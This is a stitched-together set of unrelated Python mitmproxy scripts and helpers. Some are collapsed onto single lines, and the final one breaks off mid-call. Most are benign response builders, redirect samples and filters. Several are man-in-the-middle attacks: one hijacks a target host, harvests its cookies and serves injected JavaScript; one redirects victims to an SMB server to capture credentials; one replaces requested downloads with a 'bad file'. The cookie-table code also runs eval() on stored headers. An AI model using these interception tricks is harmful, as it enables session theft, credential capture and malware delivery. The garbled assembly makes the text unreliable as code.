def test_set_cookies(self):
    """Round-trip check: cookies written via set_cookies() survive a re-parse."""
    resp = tresp()
    jar = resp.cookies
    jar.add("foo", ["bar", ODictCaseless()])
    resp.set_cookies(jar)
    reparsed = resp.cookies
    assert len(reparsed) == 1
    assert reparsed["foo"] == [["bar", ODictCaseless()]]
def request(ctx, flow): if flow.request.pretty_host(hostheader=True) == "google.com": if flow.request.path == "/rick_js": print "rick" flow.reply( HTTPResponse([1, 1], 200, "OK", ODictCaseless( [["content-type", "text/javascript"]]), rick_js)) if flow.request.path == "/rick_mp3": print "mp3" flow.reply( HTTPResponse([1, 1], 200, "OK", ODictCaseless([["content-type", "audio/mpeg"]]), rick_mp3))
def with_html(cls, html):
    """Alternate constructor: a 200 response whose body is *html*."""
    return cls(code=200,
               content=html,
               msg="",
               headers=ODictCaseless(),
               httpversion=(1, 1))
def _to_libmproxy_response(self, request, response):
    """
    Convert w3af.core.data.url.HTTPResponse.HTTPResponse to
    libmproxy.http.HTTPResponse
    """
    charset = response.charset
    body = smart_str(response.body, charset, errors='ignore')

    # Re-encode every header name/value in the response charset.
    headers = ODictCaseless([
        (smart_str(name, charset, errors='ignore'),
         smart_str(value, charset, errors='ignore'))
        for name, value in response.headers.items()
    ])

    # This is an important step! The ExtendedUrllib will gunzip the body
    # for us, which is great, but we need to change the content-encoding
    # for the response in order to match the decoded body and avoid the
    # HTTP client using the proxy from failing
    headers['content-encoding'] = ['identity']

    return LibMITMProxyHTTPResponse(request.httpversion,
                                    response.get_code(),
                                    str(response.get_msg()),
                                    headers,
                                    body)
def perform_http_connection(request, url, port):
    """Replay *request* against url:port over plain HTTP; return the parsed
    HTTPResponse, or None when anything goes wrong (best-effort)."""
    try:
        conn = httplib.HTTPConnection(url, port)
        conn.request(request.method,
                     request.url,
                     body=request.content,
                     headers=dict(request.headers.items()))
        raw = conn.getresponse()
        hdrs = ODictCaseless.from_httplib_headers(raw.getheaders())
        return HTTPResponse(code=raw.status,
                            content=raw.read(),
                            msg="",
                            httpversion=(1, 1),
                            headers=hdrs)
    except Exception as ex:
        error("Error Happened")
        error(ex)
        error("method: %s\nurl: %s\nbody: --\nheaders: --"
              % (request.method, request.url))
        return None
def request(context, flow):
    """Answer every *.com request with a 301 to the BBC homepage."""
    if not flow.request.host.endswith("com"):
        return
    redirect = Response(flow.request, [1, 1], 301, "OK",
                        ODictCaseless([["Location", "http://www.bbc.co.uk"]]),
                        "", None)
    flow.request.reply(redirect)
def from_intercepted_response(cls, response):
    """Alternate constructor from an intercepted httplib-style response."""
    hdrs = ODictCaseless.from_httplib_headers(response.headers)
    return cls(code=response.status,
               content=response.body_response(),
               msg="",
               httpversion=(1, 1),
               headers=hdrs)
def respond(flow, content):
    """Short-circuit the flow with a 200 text/xml response carrying *content*."""
    hdrs = ODictCaseless([["Content-Type", "text/xml"]])
    reply = Response(flow.request, [1, 1], 200, "OK", hdrs, content, None)
    flow.request.reply(reply)
def set_response(flow, content): print 'Response from server -> ', flow.response flow.response.code = 200 flow.response.msg = "OK" flow.response.headers = ODictCaseless([["Content-Type","text/xml"]]) flow.response.content = content print "Setting new response -> ", flow.response print "Body -> ", content
def request(context, flow):
    """Short-circuit with an empty 304 for URLs the history says to skip."""
    req = flow.request
    if not history.should_skip(req.url):
        return
    context.log("skipping: %s" % req.url)
    flow.reply(HTTPResponse((1, 1), 304, "NOT MODIFIED", ODictCaseless(), None))
def handle_request(self, flow):
    """Capture the body of any request carrying a LOG header and 404 it;
    everything else passes through untouched."""
    if not flow.request.headers['LOG']:
        flow.reply()
        return
    blocked = HTTPResponse([1, 1], 404, "Not Found",
                           ODictCaseless([["Content-Type", "text/html"]]),
                           "Caught by proxy")
    self.log += flow.request.content + "\r\n"
    flow.reply(blocked)
def request(context, flow):
    """Fake a response for example.com; reroute example.org to mitmproxy.org."""
    if flow.request.host.endswith("example.com"):
        fake = HTTPResponse([1, 1], 200, "OK",
                            ODictCaseless([["Content-Type", "text/html"]]),
                            "helloworld")
        flow.request.reply(fake)
    if flow.request.host.endswith("example.org"):
        flow.request.host = "mitmproxy.org"
        flow.request.headers["Host"] = ["mitmproxy.org"]
def send_connect_request(conn, host, port):
    """Issue a CONNECT for host:port through *conn*; return the upstream
    response, raising ProxyError unless it is a 200."""
    connect_req = HTTPRequest("authority", "CONNECT", None, host, port, None,
                              (1, 1), ODictCaseless(), "")
    conn.send(connect_req._assemble())
    resp = HTTPResponse.from_stream(conn.rfile, connect_req.method)
    if resp.code == 200:
        return resp
    raise proxy.ProxyError(
        resp.code,
        "Cannot establish SSL " +
        "connection with upstream proxy: \r\n" + str(resp._assemble()))
def request(context, flow):
    # Page-load timing probe: logs a timestamped line for every URL fetched,
    # optionally sleeps on one configured "suspend" URL, and closes the log
    # when a /commands/exit request arrives on localhost.
    try:
        if flow.request.pretty_host(hostheader=True).endswith("localhost"):
            if flow.request.path.strip().startswith("/commands/exit"):
                # Control endpoint: finish the log file and acknowledge.
                resp = HTTPResponse(
                    [1, 1], 200, "OK",
                    ODictCaseless([["Content-Type", "text/html"]]),
                    "done %s" % context.fullLogPath)
                context.lock.acquire()
                if not context.outFile.closed:
                    context.outFile.write('EndFile\n')
                    context.outFile.close()
                context.lock.release()
                print "close file ", context.fullLogPath
                flow.reply(resp)
        else:
            # NOTE(review): reconstructed from collapsed source — this `else`
            # is assumed to pair with the localhost check (i.e. all non-local
            # traffic gets logged); confirm against the original layout.
            print flow.request.path.strip()
            #d = flow.request.path.find('?')
            #realPath = flow.request.path
            #if d != -1:
            #    realPath = flow.request.path[:d]
            # Normalize: rebuild the URL without query/fragment, lowercase it.
            url = "%s://%s%s" % (flow.request.scheme, flow.request.host,
                                 flow.request.path)
            o = urlparse(url)
            url = "%s://%s%s" % (flow.request.scheme, o.netloc, o.path)
            url = url.lower()
            currentTime = int(time.time())
            if url == context.firstURL:
                context.lock.acquire()
                print "find first url ", url
                context.startTime = currentTime
                context.lock.release()
            if context.suspendURL and url == context.suspendURL:
                # Hold the target URL for `threshold` seconds, logging
                # START/END timestamps around the sleep.
                print "target url wait for %d seconds" % context.threshold
                context.lock.acquire()
                log = "%d TARGETURL:%s START\n" % (currentTime, url)
                if not context.outFile.closed:
                    context.outFile.write(log)
                context.lock.release()
                time.sleep(context.threshold)
                currentTime = int(time.time())
                context.lock.acquire()
                log = "%d TARGETURL:%s END\n" % (currentTime, url)
                if not context.outFile.closed:
                    context.outFile.write(log)
                context.lock.release()
            else:
                context.lock.acquire()
                log = "%d REGULARURL:%s END\n" % (currentTime, url)
                if not context.outFile.closed:
                    context.outFile.write(log)
                context.lock.release()
    except Exception as e:
        # NOTE(review): `url` may be unbound here if the exception fired
        # before it was assigned.
        print >> sys.stderr, "error %s: [%s]" % (str(e), url)
def handle_request(self, flow):
    """
    Hijack requests to the configured target host: harvest their cookies and
    answer with the JavaScript payload; all other flows pass through.

    Fixes: the original fell through to the unconditional flow.reply() after
    already replying with the payload, answering the matched flow twice; it
    also computed an unused local `hid`.
    """
    if flow.request.host == self.options.target:
        self.collect_cookies(flow.request.headers)
        resp = HTTPResponse(
            [1, 1], 200, "",
            ODictCaseless([["Content-Type", "application/javascript"]]),
            self.js_code)
        flow.reply(resp)
        return  # already answered; do not reply a second time
    flow.reply()
def build_flow_response(self, req, status, status_text, headers, body):
    """
    Build a libmproxy flow.Response for *req* from raw status/headers/body.

    Fixes: the original rebound the `headers` parameter to an empty
    ODictCaseless and then iterated that (empty) odict, so the caller's
    headers were silently dropped — the response always went out headerless.
    """
    odict_headers = ODictCaseless()
    for k, v in headers:
        # ODict values are lists of strings; assumes each incoming pair
        # carries a single value — TODO confirm the caller's header format.
        odict_headers[k] = [v]
    logging.info("%d %s (%d) [%s %s]: ", status, status_text, len(body),
                 req.method, req.get_url())
    return flow.Response(req, [1, 1], status, status_text,
                         odict_headers, body, None)
def request(context, flow):
    """Replace any page whose host is not whitelisted with a local template."""
    # pretty_host(hostheader=True) takes the Host: header of the request into
    # account, which is useful in transparent mode where we usually only have
    # the IP otherwise.
    host = flow.request.pretty_host(hostheader=True)
    if host in whitelist:
        return
    # Method 1: Answer with a locally generated response
    body = template.replace('$URL', flow.request.url)
    flow.reply(HTTPResponse(
        [1, 1], 200, "OK",
        ODictCaseless([["Content-Type", "text/html"]]),
        body))
def request(flow):
    """Fake a 302 for sojourncollege.com, then reroute the host header."""
    if flow.request.pretty_host.endswith("sojourncollege.com"):
        hdrs = ODictCaseless([["Content-Type", "text/html"]])
        flow.request.reply(Response(flow.request, [1, 1], 302, "OK",
                                    hdrs, "helloworld", None))
    if flow.request.host.endswith("sojourncollege.com"):
        flow.request.host = "mitmproxy.org"
        flow.request.headers["Host"] = ["mitmproxy.org"]
def add_flow(address, request, response):
    # Wrap a dnschef DNS query/answer pair in a synthetic HTTP flow so the
    # mitmproxy master can display it: the DNS question becomes the request,
    # the answer the response, both tagged with a "dnschef/<qtype>" type.
    flow = Flow(
        Request(client_conn=ClientConnect(address),
                httpversion=[1, 1],
                host="dnschef",
                port=53,
                scheme="dns",
                method="DNS",
                path="/%s/%s-record" % (str(request.q.qname),
                                        str(QTYPE[request.q.qtype]).lower()),
                # NOTE(review): "dnschef/%srecord" lacks the '-' that the
                # response header below has — looks like a typo; confirm.
                headers=ODictCaseless([[
                    "Content-Type",
                    "dnschef/%srecord" % str(QTYPE[request.q.qtype]).lower()
                ]]),
                content=str(request)))
    flow.response = Response(
        flow.request, [1, 1], 200, "FAKE-HTTP",
        ODictCaseless([[
            "Content-Type",
            "dnschef/%s-record" % str(QTYPE[request.q.qtype]).lower()
        ]]),
        str(response), None)
    ctx._master.load_flow(flow)
def request(context, flow):
    """Answer with a 302 pointing the client at a file:// URL on the
    configured SMB server (UNC-style credential capture)."""
    # Modify this value to disable redirection for the current request
    should_redirect = True
    if should_redirect:
        location = "file://{0}/{1}".format(context.smbserver_ip,
                                           context.identifier)
        flow.reply(HTTPResponse(
            [1, 1], 302, "Found",
            ODictCaseless([["Content-Type", "text/html"],
                           ["Location", location]]),
            ""))
def request(context, flow):
    """Serve the contents of data.txt for any openwifi.com request."""
    # pretty_host(hostheader=True) takes the Host: header of the request into
    # account, which is useful in transparent mode where we usually only have
    # the IP otherwise.
    if not flow.request.pretty_host(hostheader=True).endswith("openwifi.com"):
        return
    with open('data.txt', 'r') as reader:
        links = reader.read()
    flow.reply(HTTPResponse(
        [1, 1], 200, "OK",
        ODictCaseless([["Content-Type", "text/html"]]),
        links))
def request(context, flow):
    """HTTPS-Everywhere style upgrade: rewrite known hosts to their secure
    URL, answer 403 for http hosts with no rewrite rule."""
    replacer = FindRules('default.rulesets')
    if flow.request.scheme != 'http':
        return
    candidate = ('http://' +
                 flow.request.pretty_host(hostheader=True) +
                 flow.request.path)
    url = replacer.find(candidate)
    if url:
        flow.request.url = url
        return
    flow.reply(HTTPResponse(
        [1, 1], 403, 'FORBIDDEN',
        ODictCaseless([["Content-Type", "text/html"]]),
        "The requested page can not be accessed securely"))
def request(context, flow):
    """Swap any download matching the configured suffix for a local file."""
    if not flow.request.path.endswith(context.filename_suffix):
        return
    context.log("Poisoning the requested file")
    context.log(flow.request.path)
    context.log("Closing server connection")
    flow.server_conn.close()
    # TODO: Don't read the whole file in memory-maybe use a web server that already solves this
    with open(context.path_to_bad_file, "rb") as f:
        payload = f.read()
    flow.reply(HTTPResponse(
        [1, 1], 200, "OK",
        ODictCaseless([["Content-Type",
                        guess_type(context.path_to_bad_file)[0]]]),
        payload))
def do_request(context, flow): """ Called when a client request has been received. """ # context.log("[nick] request") global DeviceState resp = None # print DeviceState # print flow.request.headers if (flow.request.pretty_host(hostheader=True).endswith("captive.apple.com") or flow.request.path in r'/library/test/success.html') and flow.request.headers['X-Real-IP']: for key, value in DeviceState.items(): if int(time.time()) - value[1] > 300: del DeviceState[key] RealIP = flow.request.headers['X-Real-IP'][0] ServerIP = flow.request.headers['ServerAddress'][0] # print ServerIP AdLink = "http://%s/withficode/ios/index.htm"%ServerIP SuccessResp=HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>") PendingResp=HTTPResponse([1, 1], 302, "OK",ODictCaseless([["Content-Type", "text/html"], ["location", AdLink]]),"") if RealIP in DeviceState.keys(): if DeviceState[RealIP][0] == 'accept': resp = SuccessResp elif DeviceState[RealIP][0] == 'pending': resp = PendingResp DeviceState[RealIP][0] = 'accept' else: resp = PendingResp DeviceState[RealIP] = ['pending', int(time.time())] flow.reply(resp)
def send_connect_request(conn, host, port, update_state=True):
    """Issue a CONNECT for host:port through *conn*; optionally record the
    tunnel in conn.state. Raises ProxyError unless the upstream returns 200."""
    connect_req = HTTPRequest("authority", "CONNECT", None, host, port, None,
                              (1, 1), ODictCaseless(), "")
    conn.send(connect_req.assemble())
    resp = HTTPResponse.from_stream(conn.rfile, connect_req.method)
    if resp.code != 200:
        raise proxy.ProxyError(
            resp.code,
            "Cannot establish SSL " +
            "connection with upstream proxy: \r\n" + str(resp.assemble()))
    if update_state:
        conn.state.append(("http", {
            "state": "connect",
            "host": host,
            "port": port,
        }))
    return resp
def request(context, flow):
    # pretty_host(hostheader=True) takes the Host: header of the request into
    # account, which is useful in transparent mode where we usually only have
    # the IP otherwise.
    host = flow.request.pretty_host(hostheader=True)
    # Method 1: Answer with a locally generated response
    if host.endswith("example.com"):
        flow.reply(HTTPResponse(
            [1, 1], 200, "OK",
            ODictCaseless([["Content-Type", "text/html"]]),
            "helloworld"))
    # Method 2: Redirect the request to a different server
    if host.endswith("example.org"):
        flow.request.host = "mitmproxy.org"
        flow.request.update_host_header()
def _to_libmproxy_response(self, request, response):
    """
    Convert w3af.core.data.url.HTTPResponse.HTTPResponse to
    libmproxy.http.HTTPResponse
    """
    charset = response.charset
    body = smart_str(response.body, charset, errors='ignore')
    pairs = []
    for name, value in response.headers.items():
        pairs.append((smart_str(name, charset, errors='ignore'),
                      smart_str(value, charset, errors='ignore')))
    return LibMITMProxyHTTPResponse(request.httpversion,
                                    response.get_code(),
                                    str(response.get_msg()),
                                    ODictCaseless(pairs),
                                    body)
def perform_http_connection(request, url, port):
    """Replay *request* against url:port over plain HTTP.

    Returns the parsed HTTPResponse, or None on any failure (logged)."""
    try:
        conn = httplib.HTTPConnection(url, port)
        request_headers = dict(request.headers.items())
        conn.request(request.method, request.url,
                     body=request.content, headers=request_headers)
        httplib_response = conn.getresponse()
        return HTTPResponse(
            code=httplib_response.status,
            content=httplib_response.read(),
            msg="",
            httpversion=(1, 1),
            headers=ODictCaseless.from_httplib_headers(
                httplib_response.getheaders()))
    except Exception as ex:
        error("Error Happened")
        error(ex)
        error("method: %s\nurl: %s\nbody: --\nheaders: --"
              % (request.method, request.url))
        return None
def handle_request(self, msg):
    # FlowMaster hook: logs every request URL to the extension, serves the
    # mitmproxy CA-certificate mini site on mitm.it, and answers URLs that
    # match an enabled proxy rule from the local cache instead of the network.
    f = flow.FlowMaster.handle_request(self, msg)
    fullURL = f.request.scheme + '://' + f.request.host
    # Append the port only when it is not the scheme default.
    if ((f.request.scheme == 'http' and f.request.port == 80) == False and
            (f.request.scheme == 'https' and f.request.port == 443) == False):
        fullURL = fullURL + ':' + str(f.request.port)
    fullURL = fullURL + f.request.path
    send_message(json.dumps({'method': 'log', 'message': fullURL}))
    if (f.request.host == 'mitm.it'):
        # Serve the bundled certificate-install pages ourselves.
        path = f.request.path
        if path.find('?') > -1:
            path = path[:path.find('?')]
        if path == '/':
            path = '/index.html'
        mimeType = '';
        if path.rfind('.') > -1:
            extension = path[path.rfind('.') + 1:]
            if extension == 'html':
                mimeType = 'text/html'
            elif extension == 'css':
                mimeType = 'text/css'
            elif extension == 'cer':
                mimeType = 'application/pkix-cert'
            elif extension == 'pem':
                mimeType = 'application/x-pem-file'
            elif extension == 'p12':
                mimeType = 'application/x-pkcs12'
        responseHeaders = ODictCaseless([('content-type', mimeType)])
        try:
            if path in ['/mitmproxy-ca-cert.cer', '/mitmproxy-ca-cert.pem',
                        '/mitmproxy-ca-cert.p12']:
                with open(expanduser('~/.mitmproxy' + path), 'rb') as certfile:
                    content = certfile.read()
            elif path in ['/index.html', '/mitmproxy.css']:
                with open(sys.prefix + '/tamper-cert' + path, 'rb') as uifile:
                    content = uifile.read()
            responseHeaders['Content-Length'] = [len(content)]
            resp = HTTPResponse([1,1], 200, 'OK', responseHeaders, content)
            msg.reply(resp)
        except:
            # NOTE(review): bare except also masks the NameError raised when
            # `content` was never assigned (unknown path) — any failure 404s.
            resp = HTTPResponse([1,1], 404, 'Not Found', ODictCaseless([]), '')
            msg.reply(resp)
    for url in urlsToProxy:
        # Rule URLs may contain '*' wildcards; translate to a regex.
        regexURL = '^' + re.escape(url['url']).replace('\\*', '.*?') + '$'
        if (re.match(regexURL, fullURL) and url['isEnabled'] == True):
            send_message(json.dumps({'method': 'log', 'message': 'Serving cached file (' + url['cachedFilename'] + ')'}))
            localFile = open(self._cachedFilesPath + url['cachedFilename'], 'r');
            content = localFile.read()
            localFile.close();
            responseHeaders = []
            hasViaHeader = False
            # Copy the recorded headers, dropping content-encoding (the cached
            # body is stored decoded) and tagging the Via header.
            for header in url['responseHeaders']:
                if (header['name'].lower() != 'content-encoding'):
                    if (header['name'].lower() == 'via'):
                        hasViaHeader = True
                        if (header['value'].find('tamper') == -1):
                            header['value'] += ', tamper'
                    responseHeaders.append((header['name'], header['value']))
            if (not hasViaHeader):
                responseHeaders.append(['via', 'tamper'])
            # Force revalidation so the client never caches the tampered copy.
            responseHeaders.append(['Cache-Control', 'no-cache, no-store, must-revalidate'])
            responseHeaders.append(['Pragma', 'no-cache'])
            responseHeaders.append(['Expires', '0'])
            resp = HTTPResponse([1,1], 200, 'OK', ODictCaseless(responseHeaders), content)
            msg.reply(resp)
            break
    if 'Accept-Encoding' in f.request.headers:
        f.request.headers['Accept-Encoding'] = ['none']
    # NOTE(review): when a branch above already replied, this replies a
    # second time — confirm msg.reply tolerates that in this mitmproxy version.
    if f:
        msg.reply()
    return f
def build_http_cookie_table(database, verbose=False):
    """ Extracts all http-cookie data from HTTP headers and generates a new table """
    con = sqlite3.connect(database)
    cur1 = con.cursor()  # outer cursor: scans stored headers
    cur2 = con.cursor()  # inner cursor: inserts parsed cookies
    cur1.execute("CREATE TABLE IF NOT EXISTS http_request_cookies ( \
        id INTEGER PRIMARY KEY AUTOINCREMENT, \
        crawl_id INTEGER NOT NULL, \
        header_id INTEGER NOT NULL, \
        name VARCHAR(200) NOT NULL, \
        value TEXT NOT NULL, \
        accessed DATETIME);")
    cur1.execute("CREATE TABLE IF NOT EXISTS http_response_cookies ( \
        id INTEGER PRIMARY KEY AUTOINCREMENT, \
        crawl_id INTEGER NOT NULL, \
        header_id INTEGER NOT NULL, \
        name VARCHAR(200) NOT NULL, \
        value TEXT NOT NULL, \
        domain VARCHAR(500), \
        path VARCHAR(500), \
        expires DATETIME, \
        max_age REAL, \
        httponly BOOLEAN, \
        secure BOOLEAN, \
        comment VARCHAR(200), \
        version VARCHAR(100), \
        accessed DATETIME);")
    con.commit()

    # Parse http request cookies
    commit = 0
    last_commit = 0
    # Only rows not already parsed into http_request_cookies.
    cur1.execute("SELECT id, crawl_id, headers, time_stamp FROM http_requests \
        WHERE id NOT IN (SELECT header_id FROM http_request_cookies)")
    row = cur1.fetchone()
    while row is not None:
        req_id, crawl_id, header_str, time_stamp = row
        header = ODictCaseless()
        try:
            header.load_state(json.loads(header_str))
        except ValueError:
            #XXX temporary shim -- should be removed
            # SECURITY NOTE(review): eval() on stored header text executes
            # arbitrary code if the database contents are untrusted.
            header.load_state(eval(header_str))
        for cookie_str in header['Cookie']:
            queries = parse_cookies(cookie_str, verbose)
            for query in queries:
                cur2.execute("INSERT INTO http_request_cookies \
                    (crawl_id, header_id, name, value, accessed) \
                    VALUES (?,?,?,?,?)",
                    (crawl_id, req_id)+query+(time_stamp,))
                commit += 1
                # Commit in batches of 10k to bound transaction size.
                if commit % 10000 == 0 and commit != 0 and commit != last_commit:
                    last_commit = commit
                    con.commit()
                    if verbose:
                        print str(commit) + " Cookies Processed"
        row = cur1.fetchone()
    con.commit()
    print "Processing HTTP Request Cookies Complete"

    # Parse http response cookies
    commit = 0
    last_commit = 0
    cur1.execute("SELECT id, crawl_id, url, headers, time_stamp FROM http_responses \
        WHERE id NOT IN (SELECT header_id FROM http_response_cookies)")
    row = cur1.fetchone()
    while row is not None:
        resp_id, crawl_id, req_url, header_str, time_stamp = row
        header = ODictCaseless()
        try:
            header.load_state(json.loads(header_str))
        except ValueError:
            #XXX temporary shim -- should be removed
            header.load_state(eval(header_str))
        for cookie_str in header['Set-Cookie']:
            queries = parse_cookies(cookie_str, verbose, url=req_url,
                                    response_cookie=True)
            for query in queries:
                cur2.execute("INSERT INTO http_response_cookies \
                    (crawl_id, header_id, name, \
                    value, domain, path, expires, max_age, \
                    httponly, secure, comment, version, accessed) \
                    VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)",
                    (crawl_id, resp_id)+query+(time_stamp,))
                commit += 1
                if commit % 10000 == 0 and commit != 0 and commit != last_commit:
                    last_commit = commit
                    con.commit()
                    if verbose:
                        print str(commit) + " Cookies Processed"
        row = cur1.fetchone()
    con.commit()
    print "Processing HTTP Response Cookies Complete"
    con.close()
def build_http_cookie_table(database, verbose=False):
    """ Extracts all http-cookie data from HTTP headers and generates a new table """
    # Variant that reads from the *_proxy header tables.
    con = sqlite3.connect(database)
    cur1 = con.cursor()  # outer cursor: scans stored headers
    cur2 = con.cursor()  # inner cursor: inserts parsed cookies
    cur1.execute("CREATE TABLE IF NOT EXISTS http_request_cookies ( \
        id INTEGER PRIMARY KEY AUTOINCREMENT, \
        crawl_id INTEGER NOT NULL, \
        header_id INTEGER NOT NULL, \
        name VARCHAR(200) NOT NULL, \
        value TEXT NOT NULL, \
        accessed DATETIME);")
    cur1.execute("CREATE TABLE IF NOT EXISTS http_response_cookies ( \
        id INTEGER PRIMARY KEY AUTOINCREMENT, \
        crawl_id INTEGER NOT NULL, \
        header_id INTEGER NOT NULL, \
        name VARCHAR(200) NOT NULL, \
        value TEXT NOT NULL, \
        domain VARCHAR(500), \
        path VARCHAR(500), \
        expires DATETIME, \
        max_age REAL, \
        httponly BOOLEAN, \
        secure BOOLEAN, \
        comment VARCHAR(200), \
        version VARCHAR(100), \
        accessed DATETIME);")
    con.commit()

    # Parse http request cookies
    commit = 0
    last_commit = 0
    # Only rows not already parsed into http_request_cookies.
    cur1.execute(
        "SELECT id, crawl_id, headers, time_stamp FROM http_requests_proxy \
        WHERE id NOT IN (SELECT header_id FROM http_request_cookies)"
    )
    row = cur1.fetchone()
    while row is not None:
        req_id, crawl_id, header_str, time_stamp = row
        header = ODictCaseless()
        try:
            header.load_state(json.loads(header_str))
        except ValueError:
            #XXX temporary shim -- should be removed
            # SECURITY NOTE(review): eval() on stored header text executes
            # arbitrary code if the database contents are untrusted.
            header.load_state(eval(header_str))
        for cookie_str in header['Cookie']:
            queries = parse_cookies(cookie_str, verbose)
            for query in queries:
                cur2.execute(
                    "INSERT INTO http_request_cookies \
                    (crawl_id, header_id, name, value, accessed) \
                    VALUES (?,?,?,?,?)",
                    (crawl_id, req_id) + query + (time_stamp, ))
                commit += 1
                # Commit in batches of 10k to bound transaction size.
                if commit % 10000 == 0 and commit != 0 and commit != last_commit:
                    last_commit = commit
                    con.commit()
                    if verbose:
                        print str(commit) + " Cookies Processed"
        row = cur1.fetchone()
    con.commit()
    print "Processing HTTP Request Cookies Complete"

    # Parse http response cookies
    commit = 0
    last_commit = 0
    cur1.execute(
        "SELECT id, crawl_id, url, headers, time_stamp FROM http_responses_proxy \
        WHERE id NOT IN (SELECT header_id FROM http_response_cookies)"
    )
    row = cur1.fetchone()
    while row is not None:
        resp_id, crawl_id, req_url, header_str, time_stamp = row
        header = ODictCaseless()
        try:
            header.load_state(json.loads(header_str))
        except ValueError:
            #XXX temporary shim -- should be removed
            header.load_state(eval(header_str))
        for cookie_str in header['Set-Cookie']:
            queries = parse_cookies(cookie_str, verbose, url=req_url,
                                    response_cookie=True)
            for query in queries:
                cur2.execute(
                    "INSERT INTO http_response_cookies \
                    (crawl_id, header_id, name, \
                    value, domain, path, expires, max_age, \
                    httponly, secure, comment, version, accessed) \
                    VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)",
                    (crawl_id, resp_id) + query + (time_stamp, ))
                commit += 1
                if commit % 10000 == 0 and commit != 0 and commit != last_commit:
                    last_commit = commit
                    con.commit()
                    if verbose:
                        print str(commit) + " Cookies Processed"
        row = cur1.fetchone()
    con.commit()
    print "Processing HTTP Response Cookies Complete"
    con.close()
def handle_request(self, msg):
    # FlowMaster hook (tamper-files variant): logs every request URL, serves
    # the mitmproxy CA-certificate mini site on mitm.it, and answers URLs that
    # match an enabled proxy rule from the local cache instead of the network.
    f = flow.FlowMaster.handle_request(self, msg)
    fullURL = f.request.scheme + '://' + f.request.host
    # Append the port only when it is not the scheme default.
    if ((f.request.scheme == 'http' and f.request.port == 80) == False and
            (f.request.scheme == 'https' and f.request.port == 443) == False):
        fullURL = fullURL + ':' + str(f.request.port)
    fullURL = fullURL + f.request.path
    send_message(json.dumps({'method': 'log', 'message': fullURL}))
    if (f.request.host == 'mitm.it'):
        # Serve the bundled certificate-install pages ourselves.
        path = f.request.path
        if path.find('?') > -1:
            path = path[:path.find('?')]
        if path == '/':
            path = '/index.html'
        mimeType = ''
        if path.rfind('.') > -1:
            extension = path[path.rfind('.') + 1:]
            if extension == 'html':
                mimeType = 'text/html'
            elif extension == 'css':
                mimeType = 'text/css'
            elif extension == 'cer':
                mimeType = 'application/pkix-cert'
            elif extension == 'pem':
                mimeType = 'application/x-pem-file'
            elif extension == 'p12':
                mimeType = 'application/x-pkcs12'
        responseHeaders = ODictCaseless([('content-type', mimeType)])
        try:
            if path in [
                    '/mitmproxy-ca-cert.cer', '/mitmproxy-ca-cert.pem',
                    '/mitmproxy-ca-cert.p12'
            ]:
                with open(expanduser('~/.mitmproxy' + path), 'rb') as certfile:
                    content = certfile.read()
            elif path in ['/index.html', '/mitmproxy.css']:
                with open(sys.prefix + '/tamper-files' + path, 'rb') as uifile:
                    content = uifile.read()
            responseHeaders['Content-Length'] = [len(content)]
            resp = HTTPResponse([1, 1], 200, 'OK', responseHeaders, content)
            msg.reply(resp)
        except:
            # NOTE(review): bare except also masks the NameError raised when
            # `content` was never assigned (unknown path) — any failure 404s.
            resp = HTTPResponse([1, 1], 404, 'Not Found', ODictCaseless([]), '')
            msg.reply(resp)
    for url in urlsToProxy:
        # Rule URLs may contain '*' wildcards; translate to a regex.
        regexURL = '^' + re.escape(url['url']).replace('\\*', '.*?') + '$'
        if (re.match(regexURL, fullURL) and url['isEnabled'] == True):
            send_message(
                json.dumps({
                    'method': 'log',
                    'message':
                    'Serving cached file (' + url['cachedFilename'] + ')'
                }))
            localFile = open(self._cachedFilesPath + url['cachedFilename'], 'r')
            content = localFile.read()
            localFile.close()
            responseHeaders = []
            hasViaHeader = False
            # Copy the recorded headers, dropping content-encoding (the cached
            # body is stored decoded) and tagging the Via header.
            for header in url['responseHeaders']:
                if (header['name'].lower() != 'content-encoding'):
                    if (header['name'].lower() == 'via'):
                        hasViaHeader = True
                        if (header['value'].find('tamper') == -1):
                            header['value'] += ', tamper'
                    responseHeaders.append(
                        (header['name'], header['value']))
            if (not hasViaHeader):
                responseHeaders.append(['via', 'tamper'])
            # Force revalidation so the client never caches the tampered copy.
            responseHeaders.append(
                ['Cache-Control', 'no-cache, no-store, must-revalidate'])
            responseHeaders.append(['Pragma', 'no-cache'])
            responseHeaders.append(['Expires', '0'])
            resp = HTTPResponse([1, 1], 200, 'OK',
                                ODictCaseless(responseHeaders), content)
            msg.reply(resp)
            break
    if 'Accept-Encoding' in f.request.headers:
        f.request.headers['Accept-Encoding'] = ['none']
    # NOTE(review): when a branch above already replied, this replies a
    # second time — confirm msg.reply tolerates that in this mitmproxy version.
    if f:
        msg.reply()
    return f
def request(context, flow):
    # Parental-control style filter: whitelist (WL) short-circuits, then the
    # blacklist (BL), then social networks (flag SS) and web searches (flag
    # SN) are blocked with an explanatory plain-HTML page.
    global social_networks
    global web_searchs
    global SS
    global SN
    global BL
    global WL
    # pretty_host(hostheader=True) takes the Host: header of the request into account,
    # Time check
    # Adult content
    ################################
    # Content grabbing for testing
    #try:
    #    home = expanduser("~")
    #    site_data = urllib2.urlopen("http://"+flow.request.pretty_host(hostheader=True)).read()
    #    text_file = open(home+"/temp.txt", "w")
    #    text_file.write(site_data)
    #    text_file.close()
    #except:
    #    pass
    ################################
    # Checking WL
    if (WL):
        if (WL[0] != ''):
            # Whitelisted hosts bypass every other rule.
            if flow.request.pretty_host(hostheader=True).endswith(tuple(WL)):
                return 1
    # Checking if page is on BL
    if flow.request.pretty_host(hostheader=True).endswith(tuple(BL)):
        #print flow.request.pretty_host(hostheader=True)
        resp = HTTPResponse([1, 1], 200, "OK",
                            ODictCaseless([["Content-Type", "text/html"]]),
                            "Reason: This site is on Black list")
        flow.reply(resp)
    # Checking if social networks are banned
    if (SS):
        if flow.request.pretty_host(hostheader=True).endswith(
                tuple(social_networks)):
            #print flow.request.pretty_host(hostheader=True)
            resp = HTTPResponse([1, 1], 200, "OK",
                                ODictCaseless([["Content-Type", "text/html"]]),
                                "Reason: Social network is blocked")
            flow.reply(resp)
    # Checking if web searches are banned
    if (SN):
        if flow.request.pretty_host(hostheader=True).endswith(
                tuple(web_searchs)):
            #print flow.request.pretty_host(hostheader=True)
            resp = HTTPResponse(
                [1, 1], 200, "OK",
                ODictCaseless([["Content-Type", "text/html"]]),
